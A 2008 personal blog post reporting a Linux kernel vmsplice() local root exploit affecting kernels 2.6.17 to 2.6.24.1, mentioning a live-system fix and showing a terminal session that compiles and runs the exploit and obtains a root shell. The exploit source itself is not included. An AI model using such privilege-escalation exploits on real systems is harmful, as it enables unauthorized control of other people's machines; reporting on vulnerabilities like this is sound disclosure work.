Polska wersja

Marcin Sochacki (Wanted) Blog, Internet, Technology

» Oh, fsck! A new exploit for Linux

There's a new Linux local root exploit, working in kernels 2.6.17 – 2.6.24.1. It's a long time since such a big hole was found in so many kernel versions at once. The exploit was confirmed to work in Ubuntu, Debian, Fedora and possibly many more. So it looks like we'll need a run of quick updates, goddamnit! The hole was found in vmsplice() function, which by the way can be easily disabled at kernel compilation stage.

Fortunately there already exists a quick fix working on a live system (it doesn't require to reinstall the kernel).

The exploit in action:

wanted@fafik: /crack/local-root-exp$ gcc exp.c -static -Wno-format
wanted@fafik: /crack/local-root-exp$ ./a.out
———————————–
 Linux vmsplice Local Root Exploit
 By qaaz
———————————–
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7ede000 .. 0xb7f10000
[+] root
root@fafik: /crack/local-root-exp# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),106(lpadmin),107(admin),1000(wanted)

2008/02/11 01:59 | computers/linux/

» Comments









My blog

Categories

/ (69)
  computers/ (40)
    apple/ (1)
    google/ (14)
    linux/ (3)
    microsoft/ (9)
    other/ (4)
    spam/ (1)
    wikipedia/ (3)
    www/ (5)
  i_like_it/ (15)
    film/ (6)
    fun/ (1)
    photo/ (2)
    sport/ (6)
  info/ (4)
  media/ (5)
    ad/ (5)
  places/ (5)
    aconcagua/ (1)
    dublin/ (2)
    tricity/ (2)

Archives


Links


Color free zone

This site is Wit 2.0™ compliant!